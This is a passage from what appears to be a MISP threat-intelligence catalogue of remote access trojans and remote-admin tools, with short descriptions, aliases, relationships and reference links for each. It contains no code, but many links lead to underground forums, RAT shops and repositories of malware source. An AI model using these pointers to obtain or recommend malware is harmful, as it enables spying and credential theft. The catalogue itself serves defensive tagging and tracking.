http://darkratphp.blogspot.lu/

Greame

The tag is: misp-galaxy:rat="Greame"

Table 8638. Table References

Links

https://sites.google.com/site/greymecompany/greame-rat-project

HawkEye

HawkEye is a popular RAT that can be used as a keylogger, it is also able to identify login events and record the destination, username, and password.

The tag is: misp-galaxy:rat="HawkEye"

Table 8639. Table References

Links

http://securityaffairs.co/wordpress/54837/hacking/one-stop-shop-hacking.html

https://www.bleepingcomputer.com/news/security/zoho-heavily-used-by-keyloggers-to-transmit-stolen-data/

jRAT

jRAT is the cross-platform remote administrator tool that is coded in Java, Because its coded in Java it gives jRAT possibilities to run on all operation systems, Which includes Windows, Mac OSX and Linux distributions.

The tag is: misp-galaxy:rat="jRAT"

jRAT is also known as:

  • JacksBot

jRAT has relationships with:

  • similar: misp-galaxy:malpedia="jRAT" with estimative-language:likelihood-probability="likely"

Table 8640. Table References

Links

https://www.rekings.com/shop/jrat/

jSpy

jSpy is a Java RAT.

The tag is: misp-galaxy:rat="jSpy"

jSpy has relationships with:

  • similar: misp-galaxy:malpedia="jSpy" with estimative-language:likelihood-probability="likely"

Table 8641. Table References

Links

https://leakforums.net/thread-479505

LuxNET

Just saying that this is a very badly coded RAT by the biggest skid in this world, that is XilluX. The connection is very unstable, the GUI is always flickering because of the bad Multi-Threading and many more bugs.

The tag is: misp-galaxy:rat="LuxNET"

Table 8642. Table References

Links

https://leakforums.net/thread-284656

NJRat

NJRat is a remote access trojan (RAT), first spotted in June 2013 with samples dating back to November 2012. It was developed and is supported by Arabic speakers and mainly used by cybercrime groups against targets in the Middle East. In addition to targeting some governments in the region, the trojan is used to control botnets and conduct other typical cybercrime activity. It infects victims via phishing attacks and drive-by downloads and propagates through infected USB keys or networked drives. It can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams.

The tag is: misp-galaxy:rat="NJRat"

NJRat is also known as:

  • Njw0rm

NJRat has relationships with:

  • similar: misp-galaxy:rat="Kiler RAT" with estimative-language:likelihood-probability="likely"

Table 8643. Table References

Links

https://www.cyber.nj.gov/threat-profiles/trojan-variants/njrat

Pandora

Remote administrator tool that has been developed for Windows operation system. With advanced features and stable structure, Pandora’s structure is based on advanced client / server architecture. was configured using modern technology.

The tag is: misp-galaxy:rat="Pandora"

Table 8644. Table References

Links

https://www.rekings.com/pandora-rat-2-2/

Predator Pain

Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesn’t scale well when there are a lot of infected machines and logs involved.

The tag is: misp-galaxy:rat="Predator Pain"

Predator Pain is also known as:

  • PredatorPain

Predator Pain has relationships with:

  • similar: misp-galaxy:malpedia="HawkEye Keylogger" with estimative-language:likelihood-probability="likely"

Table 8645. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-predator-pain-and-limitless.pdf

Punisher RAT

Remote administration tool

The tag is: misp-galaxy:rat="Punisher RAT"

Table 8646. Table References

Links

http://punisher-rat.blogspot.lu/

SpyGate

This is tool that allow you to control your computer form anywhere in world with full support to unicode language.

The tag is: misp-galaxy:rat="SpyGate"

Table 8647. Table References

Links

https://www.rekings.com/spygate-rat-3-2/

https://www.symantec.com/security_response/attacksignatures/detail.jsp%3Fasid%3D27950

http://spygate-rat.blogspot.lu/

Small-Net

RAT

The tag is: misp-galaxy:rat="Small-Net"

Small-Net is also known as:

  • SmallNet

Table 8648. Table References

Links

http://small-net-rat.blogspot.lu/

Vantom

Vantom is a free RAT with good option and very stable.

The tag is: misp-galaxy:rat="Vantom"

Table 8649. Table References

Links

https://www.rekings.com/vantom-rat/

Xena

Xena RAT is a fully-functional, stable, state-of-the-art RAT, coded in a native language called Delphi, it has almost no dependencies.

The tag is: misp-galaxy:rat="Xena"

Table 8650. Table References

Links

https://leakforums.net/thread-497480

XtremeRAT

This malware has been used in targeted attacks as well as traditional cybercrime. During our investigation we found that the majority of XtremeRAT activity is associated with spam campaigns that typically distribute Zeus variants and other banking-focused malware.

The tag is: misp-galaxy:rat="XtremeRAT"

Table 8651. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html

Netwire

NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers.

The tag is: misp-galaxy:rat="Netwire"

Table 8652. Table References

Links

https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data

Gh0st RAT

Gh0st RAT is a Trojan horse for the Windows platform that the operators of GhostNet used to hack into some of the most sensitive computer networks on Earth. It is a cyber spying computer program. .

The tag is: misp-galaxy:rat="Gh0st RAT"

Gh0st RAT has relationships with:

  • similar: misp-galaxy:malpedia="Ghost RAT" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

Table 8653. Table References

Links

https://www.volexity.com/blog/2017/03/23/have-you-been-haunted-by-the-gh0st-rat-today/

Plasma RAT

Plasma RAT’s stub is fairly advanced, having many robust features. Some of the features include botkilling, Cryptocurrencies Mining (CPU and GPU), persistence, anti-analysis, torrent seeding, AV killer, 7 DDoS methods and a keylogger. The RAT is coded in VB.Net. There is also a Botnet version of it (Plasma HTTP), which is pretty similar to the RAT version.

The tag is: misp-galaxy:rat="Plasma RAT"

Table 8654. Table References

Links

http://www.zunzutech.com/blog/security/analysis-of-plasma-rats-source-code/

Babylon

Babylon is a highly advanced remote administration tool with no dependencies. The server is developed in C++ which is an ideal language for high performance and the client is developed in C#(.Net Framework 4.5)

The tag is: misp-galaxy:rat="Babylon"

Table 8655. Table References

Links

https://www.rekings.com/babylon-rat/

Imminent Monitor

RAT

The tag is: misp-galaxy:rat="Imminent Monitor"

Table 8656. Table References

Links

http://www.imminentmethods.info/

DroidJack

DroidJack is a RAT (Remote Access Trojan/Remote Administration Tool) nature of remote accessing, monitoring and managing tool (Java based) for Android mobile OS. You can use it to perform a complete remote control to any Android devices infected with DroidJack through your PC. It comes with powerful function and user-friendly operation – even allows attackers to fully take over the mobile phone and steal, record the victim’s private data wilfully.

The tag is: misp-galaxy:rat="DroidJack"

Table 8657. Table References

Links

http://droidjack.net/

Quasar RAT

Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface

The tag is: misp-galaxy:rat="Quasar RAT"

Quasar RAT has relationships with:

  • similar: misp-galaxy:malpedia="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="QUASARRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="likely"

Table 8658. Table References

Links

https://github.com/quasar/QuasarRAT

https://researchcenter.paloaltonetworks.com/2017/10/unit42-tracking-subaat-targeted-phishing-attacks-point-leader-threat-actors-repository/

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

Dendroid

Dendroid is malware that affects Android OS and targets the mobile platform. It was first discovered in early of 2014 by Symantec and appeared in the underground for sale for $300. Some things were noted in Dendroid, such as being able to hide from emulators at the time. When first discovered in 2014 it was one of the most sophisticated Android remote administration tools known at that time. It was one of the first Trojan applications to get past Google’s Bouncer and caused researchers to warn about it being easier to create Android malware due to it. It also seems to have follow in the footsteps of Zeus and SpyEye by having simple-to-use command and control panels. The code appeared to be leaked somewhere around 2014. It was noted that an apk binder was included in the leak, which provided a simple way to bind Dendroid to legitimate applications.

The tag is: misp-galaxy:rat="Dendroid"

Dendroid has relationships with:

  • similar: misp-galaxy:mitre-malware="Dendroid - S0301" with estimative-language:likelihood-probability="likely"

Table 8659. Table References

Links

https://github.com/qqshow/dendroid

https://github.com/nyx0/Dendroid

Ratty

A Java R.A.T. program

The tag is: misp-galaxy:rat="Ratty"

Ratty has relationships with:

  • similar: misp-galaxy:malpedia="Ratty" with estimative-language:likelihood-probability="likely"

Table 8660. Table References

Links

https://github.com/shotskeber/Ratty

RaTRon

Java RAT

The tag is: misp-galaxy:rat="RaTRon"

Table 8661. Table References

Links

http://level23hacktools.com/forum/showthread.php?t=27971

https://leakforums.net/thread-405562?tid=405562&&pq=1

Arabian-Attacker RAT

The tag is: misp-galaxy:rat="Arabian-Attacker RAT"

Table 8662. Table References

Links

http://arabian-attacker.software.informer.com/

Androrat

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

The tag is: misp-galaxy:rat="Androrat"

Table 8663. Table References

Links

https://latesthackingnews.com/2015/05/31/how-to-hack-android-phones-with-androrat/

https://github.com/wszf/androrat

Adzok

Remote Administrator

The tag is: misp-galaxy:rat="Adzok"

Table 8664. Table References

Links

http://adzok.com/

Schwarze-Sonne-RAT

The tag is: misp-galaxy:rat="Schwarze-Sonne-RAT"

Schwarze-Sonne-RAT is also known as:

  • SS-RAT

  • Schwarze Sonne

Table 8665. Table References

Links

https://github.com/mwsrc/Schwarze-Sonne-RAT

Cyber Eye RAT

The tag is: misp-galaxy:rat="Cyber Eye RAT"

Table 8666. Table References

Links

https://www.indetectables.net/viewtopic.php?t=24245

Batch NET

The tag is: misp-galaxy:rat="Batch NET"

RWX RAT

The tag is: misp-galaxy:rat="RWX RAT"

Table 8667. Table References

Links

https://leakforums.net/thread-530663

Spynet

Spy-Net is a software that allow you to control any computer in world using Windows Operating System.He is back using new functions and good options to give you full control of your remote computer.Stable and fast, this software offer to you a good interface, creating a easy way to use all his functions

The tag is: misp-galaxy:rat="Spynet"

Table 8668. Table References

Links

http://spynet-rat-officiel.blogspot.lu/

CTOS

The tag is: misp-galaxy:rat="CTOS"

Table 8669. Table References

Links

https://leakforums.net/thread-559871

Virus RAT

The tag is: misp-galaxy:rat="Virus RAT"

Table 8670. Table References

Links

https://github.com/mwsrc/Virus-RAT-v8.0-Beta

Atelier Web Remote Commander

The tag is: misp-galaxy:rat="Atelier Web Remote Commander"

Table 8671. Table References

Links

http://www.atelierweb.com/products/

drat

A distributed, parallelized (Map Reduce) wrapper around Apache™ RAT to allow it to complete on large code repositories of multiple file types where Apache™ RAT hangs forev

The tag is: misp-galaxy:rat="drat"

Table 8672. Table References

Links

https://github.com/chrismattmann/drat

MoSucker

MoSucker is a powerful backdoor - hacker’s remote access tool.

The tag is: misp-galaxy:rat="MoSucker"

Table 8673. Table References

Links

https://www.f-secure.com/v-descs/mosuck.shtml

ProRat

ProRat is a Microsoft Windows based backdoor trojan, more commonly known as a Remote Administration Tool. As with other trojan horses it uses a client and server. ProRat opens a port on the computer which allows the client to perform numerous operations on the server (the machine being controlled).

The tag is: misp-galaxy:rat="ProRat"

Table 8675. Table References

Links

http://prorat.software.informer.com/

http://malware.wikia.com/wiki/ProRat

Setro

The tag is: misp-galaxy:rat="Setro"

Table 8676. Table References

Links

https://sites.google.com/site/greymecompany/setro-rat-project

Indetectables RAT

The tag is: misp-galaxy:rat="Indetectables RAT"

Table 8677. Table References

Links

http://www.connect-trojan.net/2015/03/indetectables-rat-v.0.5-beta.html

The tag is: misp-galaxy:rat="Luminosity Link"

Table 8678. Table References

Links

https://luminosity.link/

Orcus

The tag is: misp-galaxy:rat="Orcus"

Table 8679. Table References

Links

https://orcustechnologies.com/

Blizzard

The tag is: misp-galaxy:rat="Blizzard"

Table 8680. Table References

Links

http://www.connect-trojan.net/2014/10/blizzard-rat-lite-v1.3.1.html

Kazybot

The tag is: misp-galaxy:rat="Kazybot"

Table 8681. Table References

Links

https://www.rekings.com/kazybot-lite-php-rat/

http://telussecuritylabs.com/threats/show/TSL20150122-06

BX

The tag is: misp-galaxy:rat="BX"

Table 8682. Table References

Links

http://www.connect-trojan.net/2015/01/bx-rat-v1.0.html

death

The tag is: misp-galaxy:rat="death"

Sky Wyder

The tag is: misp-galaxy:rat="Sky Wyder"

Table 8683. Table References

Links

https://rubear.me/threads/sky-wyder-2016-cracked.127/

xRAT

Free, Open-Source Remote Administration Tool. xRAT 2.0 is a fast and light-weight Remote Administration Tool coded in C# (using .NET Framework 2.0).

The tag is: misp-galaxy:rat="xRAT"

xRAT has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="xrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="XRat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="XRat" with estimative-language:likelihood-probability="likely"

Table 8685. Table References

Links

https://github.com/c4bbage/xRAT

Biodox

The tag is: misp-galaxy:rat="Biodox"

Table 8686. Table References

Links

http://sakhackingarticles.blogspot.lu/2014/08/biodox-rat.html

Offence

Offense RAT is a free renote administration tool made in Delphi 9.

The tag is: misp-galaxy:rat="Offence"

Table 8687. Table References

Links

https://leakforums.net/thread-31386?tid=31386&&pq=1

Apocalypse

The tag is: misp-galaxy:rat="Apocalypse"

Apocalypse has relationships with:

  • similar: misp-galaxy:ransomware="Apocalypse" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Apocalypse" with estimative-language:likelihood-probability="likely"

Table 8688. Table References

Links

https://leakforums.net/thread-36962

JCage

The tag is: misp-galaxy:rat="JCage"

Table 8689. Table References

Links

https://leakforums.net/thread-363920

Nuclear RAT

Nuclear RAT (short for Nuclear Remote Administration Tool) is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003).

The tag is: misp-galaxy:rat="Nuclear RAT"

Table 8690. Table References

Links

http://malware.wikia.com/wiki/Nuclear_RAT

http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/

Ozone

C++ REMOTE CONTROL PROGRAM

The tag is: misp-galaxy:rat="Ozone"

Table 8691. Table References

Links

http://ozonercp.com/

Xanity

The tag is: misp-galaxy:rat="Xanity"

Table 8692. Table References

Links

https://github.com/alienwithin/xanity-php-rat

DarkMoon

The tag is: misp-galaxy:rat="DarkMoon"

DarkMoon is also known as:

  • Dark Moon

Kiler RAT

This remote access trojan (RAT) has capabilities ranging from manipulating the registry to opening a reverse shell. From stealing credentials stored in browsers to accessing the victims webcam. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread utilizing physic devices, such as USB drives, but also to use the victim as a pivot point to gain more access laterally throughout the network. This remote access trojan could be classified as a variant of the well known njrat, as they share many similar features such as their display style, several abilities and a general template for communication methods . However, where njrat left off KilerRat has taken over. KilerRat is a very feature rich RAT with an active development force that is rapidly gaining in popularity amongst the middle eastern community and the world.

The tag is: misp-galaxy:rat="Kiler RAT"

Kiler RAT is also known as:

  • Njw0rm

Kiler RAT has relationships with:

  • similar: misp-galaxy:rat="NJRat" with estimative-language:likelihood-probability="likely"

Table 8694. Table References

Links

https://www.alienvault.com/blogs/labs-research/kilerrat-taking-over-where-njrat-remote-access-trojan-left-off

Brat

The tag is: misp-galaxy:rat="Brat"

MINI-MO

The tag is: misp-galaxy:rat="MINI-MO"

Lost Door

Unlike most attack tools that one can only find in cybercriminal underground markets, Lost Door is very easy to obtain. It’s promoted on social media sites like YouTube and Facebook. Its maker, “OussamiO,” even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT is found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.

The tag is: misp-galaxy:rat="Lost Door"

Lost Door is also known as:

  • LostDoor

Table 8695. Table References

Links

http://lost-door.blogspot.lu/

http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/

https://www.cyber.nj.gov/threat-profiles/trojan-variants/lost-door-rat

Loki RAT

Loki RAT is a php RAT that means no port forwarding is needed for this RAT, If you dont know how to setup this RAT click on tutorial.

The tag is: misp-galaxy:rat="Loki RAT"

Table 8696. Table References

Links

https://www.rekings.com/loki-rat-php-rat/

MLRat

The tag is: misp-galaxy:rat="MLRat"

Table 8697. Table References

Links

https://github.com/BahNahNah/MLRat

Pupy

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

The tag is: misp-galaxy:rat="Pupy"

Pupy has relationships with:

  • similar: misp-galaxy:mitre-tool="Pupy - S0192" with estimative-language:likelihood-probability="likely"

Table 8699. Table References

Links

https://github.com/n1nj4sec/pupy

Nova

Nova is a proof of concept demonstrating screen sharing over UDP hole punching.

The tag is: misp-galaxy:rat="Nova"

Table 8700. Table References

Links

http://novarat.sourceforge.net/

Turkojan

Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

The tag is: misp-galaxy:rat="Turkojan"

Table 8702. Table References

Links

http://turkojan.blogspot.lu/

TINY

TINY is a set of programs that lets you control a DOS computer from any Java-capable machine over a TCP/IP connection. It is comparable to programs like VNC, CarbonCopy, and GotoMyPC except that the host machine is a DOS computer rather than a Windows one.

The tag is: misp-galaxy:rat="TINY"

Table 8703. Table References

Links

http://josh.com/tiny/

SharK

sharK is an advanced reverse connecting, firewall bypassing remote administration tool written in VB6. With sharK you will be able to administrate every PC (using Windows OS) remotely.

The tag is: misp-galaxy:rat="SharK"

SharK is also known as:

  • SHARK

  • Shark

SharK has relationships with:

  • similar: misp-galaxy:ransomware="Shark" with estimative-language:likelihood-probability="likely"

Table 8704. Table References

Links

https://www.security-database.com/toolswatch/SharK-3-Remote-Administration-Tool.html

http://lpc1.clpccd.cc.ca.us/lpc/mdaoud/CNT7501/NETLABS/Ethical_Hacking_Lab_05.pdf

Snowdoor

Backdoor.Snowdoor is a Backdoor Trojan Horse that allows unauthorized access to an infected computer. It creates an open C drive share with its default settings. By default, the Trojan listens on port 5,328.

The tag is: misp-galaxy:rat="Snowdoor"

Snowdoor is also known as:

  • Backdoor.Blizzard

  • Backdoor.Fxdoor

  • Backdoor.Snowdoor

  • Backdoor:Win32/Snowdoor

Table 8705. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2003-022018-5040-99

Paradox

The tag is: misp-galaxy:rat="Paradox"

Table 8706. Table References

Links

https://www.nulled.to/topic/155464-paradox-rat/

SpyNote

Android RAT

The tag is: misp-galaxy:rat="SpyNote"

SpyNote has relationships with:

  • similar: misp-galaxy:malpedia="SpyNote" with estimative-language:likelihood-probability="likely"

Table 8707. Table References

Links

https://www.rekings.com/spynote-v4-android-rat/

ZOMBIE SLAYER

The tag is: misp-galaxy:rat="ZOMBIE SLAYER"

HTTP WEB BACKDOOR

The tag is: misp-galaxy:rat="HTTP WEB BACKDOOR"

NET-MONITOR PRO

Net Monitor for Employees lets you see what everyone’s doing - without leaving your desk. Monitor the activity of all employees. Plus you can share your screen with your employees PCs, making demos and presentations much easier.

The tag is: misp-galaxy:rat="NET-MONITOR PRO"

Table 8708. Table References

Links

https://networklookout.com/help/

DameWare Mini Remote Control

Affordable remote control software for all your customer support and help desk needs.

The tag is: misp-galaxy:rat="DameWare Mini Remote Control"

DameWare Mini Remote Control is also known as:

  • dameware

Table 8709. Table References

Links

http://www.dameware.com/dameware-mini-remote-control

Remote Utilities

Remote Utilities is a free remote access program with some really great features. It works by pairing two remote computers together with what they call an "Internet ID." You can control a total of 10 PCs with Remote Utilities.

The tag is: misp-galaxy:rat="Remote Utilities"

Table 8710. Table References

Links

https://www.remoteutilities.com/

Ammyy Admin

Ammyy Admin is a completely portable remote access program that’s extremely simple to setup. It works by connecting one computer to another via an ID supplied by the program.

The tag is: misp-galaxy:rat="Ammyy Admin"

Ammyy Admin is also known as:

  • Ammyy

Table 8711. Table References

Links

http://ammyy-admin.soft32.com/

Ultra VNC

UltraVNC works a bit like Remote Utilities, where a server and viewer is installed on two PCs, and the viewer is used to control the server.

The tag is: misp-galaxy:rat="Ultra VNC"

Table 8712. Table References

Links

http://www.uvnc.com/

AeroAdmin

AeroAdmin is probably the easiest program to use for free remote access. There are hardly any settings, and everything is quick and to the point, which is perfect for spontaneous support.

The tag is: misp-galaxy:rat="AeroAdmin"

Table 8713. Table References

Links

http://www.aeroadmin.com/en/

Windows Remote Desktop

Windows Remote Desktop is the remote access software built into the Windows operating system. No additional download is necessary to use the program.

The tag is: misp-galaxy:rat="Windows Remote Desktop"

RemotePC

RemotePC, for good or bad, is a more simple free remote desktop program. You’re only allowed one connection (unless you upgrade) but for many of you, that’ll be just fine.

The tag is: misp-galaxy:rat="RemotePC"

Table 8714. Table References

Links

https://www.remotepc.com/

Seecreen

Seecreen (previously called Firnass) is an extremely tiny (500 KB), yet powerful free remote access program that’s absolutely perfect for on-demand, instant support.

The tag is: misp-galaxy:rat="Seecreen"

Seecreen is also known as:

  • Firnass

Table 8715. Table References

Links

http://seecreen.com/

Chrome Remote Desktop

Chrome Remote Desktop is an extension for the Google Chrome web browser that lets you setup a computer for remote access from any other Chrome browser.

The tag is: misp-galaxy:rat="Chrome Remote Desktop"

Chrome Remote Desktop has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 8716. Table References

Links

https://chrome.google.com/webstore/detail/chrome-remote-desktop/gbchcmhmhahfdphkhkmpfmihenigjmpp?hl=en

AnyDesk

AnyDesk is a remote desktop program that you can run portably or install like a regular program.

The tag is: misp-galaxy:rat="AnyDesk"

Table 8717. Table References

Links

https://anydesk.com/remote-desktop

LiteManager

LiteManager is another remote access program, and it’s strikingly similar to Remote Utilities, which I explain on the first page of this list. However, unlike Remote Utilities, which can control a total of only 10 PCs, LiteManager supports up to 30 slots for storing and connecting to remote computers, and also has lots of useful features.

The tag is: misp-galaxy:rat="LiteManager"

Table 8718. Table References

Links

http://www.litemanager.com/

Comodo Unite

Comodo Unite is another free remote access program that creates a secure VPN between multiple computers. Once a VPN is established, you can remotely have access to applications and files through the client software.

The tag is: misp-galaxy:rat="Comodo Unite"

Table 8719. Table References

Links

https://www.comodo.com/home/download/download.php?prod=comodounite

ShowMyPC

ShowMyPC is a portable and free remote access program that’s nearly identical to UltraVNC but uses a password to make a connection instead of an IP address.

The tag is: misp-galaxy:rat="ShowMyPC"

Table 8720. Table References

Links

https://showmypc.com/

join.me

join.me is a remote access program from the producers of LogMeIn that provides quick access to another computer over an internet browser.

The tag is: misp-galaxy:rat="join.me"

Table 8721. Table References

Links

https://www.join.me/

DesktopNow

DesktopNow is a free remote access program from NCH Software. After optionally forwarding the proper port number in your router, and signing up for a free account, you can access your PC from anywhere through a web browser.

The tag is: misp-galaxy:rat="DesktopNow"

Table 8722. Table References

Links

http://www.nchsoftware.com/remotedesktop/index.html

BeamYourScreen

Another free and portable remote access program is BeamYourScreen. This program works like some of the others in this list, where the presenter is given an ID number they must share with another user so they can connect to the presenter’s screen.

The tag is: misp-galaxy:rat="BeamYourScreen"

Table 8723. Table References

Links

http://www.beamyourscreen.com/

Casa RAT

The tag is: misp-galaxy:rat="Casa RAT"

Bandook RAT

Bandook is a FWB#++ reverse connection rat (Remote Administration Tool), with a small size server when packed 30 KB, and a long list of amazing features

The tag is: misp-galaxy:rat="Bandook RAT"

Table 8724. Table References

Links

http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35NEW_/

Cerberus RAT

The tag is: misp-galaxy:rat="Cerberus RAT"

Table 8725. Table References

Links

http://www.hacktohell.org/2011/05/setting-up-cerberus-ratremote.html

Syndrome RAT

The tag is: misp-galaxy:rat="Syndrome RAT"

Snoopy

Snoopy is a Remote Administration Tool. Software for controlling user computer remotely from other computer on local network or Internet.

The tag is: misp-galaxy:rat="Snoopy"

Table 8726. Table References

Links

http://www.spy-emergency.com/research/S/Snoopy.html

5p00f3r.N$ RAT

The tag is: misp-galaxy:rat="5p00f3r.N$ RAT"

P. Storrie RAT

The tag is: misp-galaxy:rat="P. Storrie RAT"

  1. Storrie RAT is also known as:

    • P.Storrie RAT

xHacker Pro RAT

The tag is: misp-galaxy:rat="xHacker Pro RAT"

NetDevil

Backdoor.NetDevil allows a hacker to remotely control an infected computer.

The tag is: misp-galaxy:rat="NetDevil"

NetDevil has relationships with:

  • similar: misp-galaxy:rat="Net Devil" with estimative-language:likelihood-probability="likely"

Table 8727. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2002-021310-3452-99

NanoCore

In September of 2015, a DigiTrust client visited a web link that was providing an Adobe Flash Player update. The client, an international retail organization, attempted to download and run what appeared to be a regular update. The computer trying to download this update was a back office system that processed end of day credit card transactions. This system also had the capability of connecting to the corporate network which contained company sales reports. DigiTrust experts were alerted to something malicious and blocked the download. The investigation found that what appeared to be an Adobe Flash Player update, was a Remote Access Trojan called NanoCore. If installation had been successful, customer credit card data, personal information, and internal sales information could have been captured and monetized. During the analysis of NanoCore, our experts found that there was much more to this RAT than simply being another Remote Access Trojan.

The tag is: misp-galaxy:rat="NanoCore"

NanoCore has relationships with:

  • similar: misp-galaxy:tool="NanoCoreRAT" with estimative-language:likelihood-probability="likely"

Table 8728. Table References

Links

https://www.digitrustgroup.com/nanocore-not-your-average-rat/

Cobian RAT

The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT) family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits. This RAT builder caught our attention as it was being offered for free and had lot of similarities to the njRAT/H-Worm family

The tag is: misp-galaxy:rat="Cobian RAT"

Cobian RAT has relationships with:

  • similar: misp-galaxy:malpedia="Cobian RAT" with estimative-language:likelihood-probability="likely"

Table 8729. Table References

Links

https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

Netsupport Manager

NetSupport Manager continues to deliver the very latest in remote access, PC support and desktop management capabilities. From a desktop, laptop, tablet or smartphone, monitor multiple systems in a single action, deliver hands-on remote support, collaborate and even record or play back sessions. When needed, gather real-time hardware and software inventory, monitor services and even view system config remotely to help resolve issues quickly.

The tag is: misp-galaxy:rat="Netsupport Manager"

Table 8730. Table References

Links

http://www.netsupportmanager.com/index.asp

Vortex

The tag is: misp-galaxy:rat="Vortex"

Assassin

The tag is: misp-galaxy:rat="Assassin"

Net Devil

The tag is: misp-galaxy:rat="Net Devil"

Net Devil is also known as:

  • NetDevil

Net Devil has relationships with:

  • similar: misp-galaxy:rat="NetDevil" with estimative-language:likelihood-probability="likely"

Table 8731. Table References

Links

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20702

A4Zeta

The tag is: misp-galaxy:rat="A4Zeta"

Table 8732. Table References

Links

http://www.megasecurity.org/trojans/a/a4zeta/A4zeta_b2.html

Greek Hackers RAT

The tag is: misp-galaxy:rat="Greek Hackers RAT"

Table 8733. Table References

Links

http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0

MRA RAT

The tag is: misp-galaxy:rat="MRA RAT"

Table 8734. Table References

Links

http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0

Sparta RAT

The tag is: misp-galaxy:rat="Sparta RAT"

Table 8735. Table References

Links

http://www.connect-trojan.net/2015/09/sparta-rat-1.2-by-azooz-ejram.html

LokiTech

The tag is: misp-galaxy:rat="LokiTech"

MadRAT

The tag is: misp-galaxy:rat="MadRAT"

Tequila Bandita

The tag is: misp-galaxy:rat="Tequila Bandita"

Table 8736. Table References

Links

http://www.connect-trojan.net/2013/07/tequila-bandita-1.3b2.html

Toquito Bandito

The tag is: misp-galaxy:rat="Toquito Bandito"

Table 8737. Table References

Links

http://www.megasecurity.org/trojans/t/toquitobandito/Toquitobandito_all.html

Hav-RAT

Written in Delphi

The tag is: misp-galaxy:rat="Hav-RAT"

Table 8739. Table References

Links

http://www.megasecurity.org/trojans/h/hav/Havrat1.2.html

ComRAT

ComRAT is a remote access tool suspected of being a decedent of Agent.btz and used by Turla.

The tag is: misp-galaxy:rat="ComRAT"

ComRAT has relationships with:

  • similar: misp-galaxy:mitre-malware="ComRAT - S0126" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Agent.BTZ" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Agent.BTZ" with estimative-language:likelihood-probability="likely"

Table 8740. Table References

Links

https://attack.mitre.org/wiki/Software/S0126

4H RAT

4H RAT is malware that has been used by Putter Panda since at least 2007.

The tag is: misp-galaxy:rat="4H RAT"

4H RAT has relationships with:

  • similar: misp-galaxy:mitre-malware="4H RAT - S0065" with estimative-language:likelihood-probability="likely"

Table 8741. Table References

Links

https://attack.mitre.org/wiki/Software/S0065

Darknet RAT

The tag is: misp-galaxy:rat="Darknet RAT"

Darknet RAT is also known as:

  • Dark NET RAT

Table 8742. Table References

Links

http://www.connect-trojan.net/2015/06/dark-net-rat-v.0.3.9.0.html

CIA RAT

The tag is: misp-galaxy:rat="CIA RAT"

Minimo

The tag is: misp-galaxy:rat="Minimo"

miniRAT

The tag is: misp-galaxy:rat="miniRAT"

Pain RAT

The tag is: misp-galaxy:rat="Pain RAT"

PlugX

PLUGX is a remote access tool (RAT) used in targeted attacks aimed toward government-related institutions and key industries. It was utilized the same way as Poison Ivy, a RAT involved in a campaign dating back to 2008.

The tag is: misp-galaxy:rat="PlugX"

PlugX is also known as:

  • Korplug

  • SOGU

  • Scontroller

PlugX has relationships with:

  • similar: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="PlugX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

Table 8743. Table References

Links

https://www.lastline.com/labsblog/an-analysis-of-plugx-malware/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PLUGX

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf

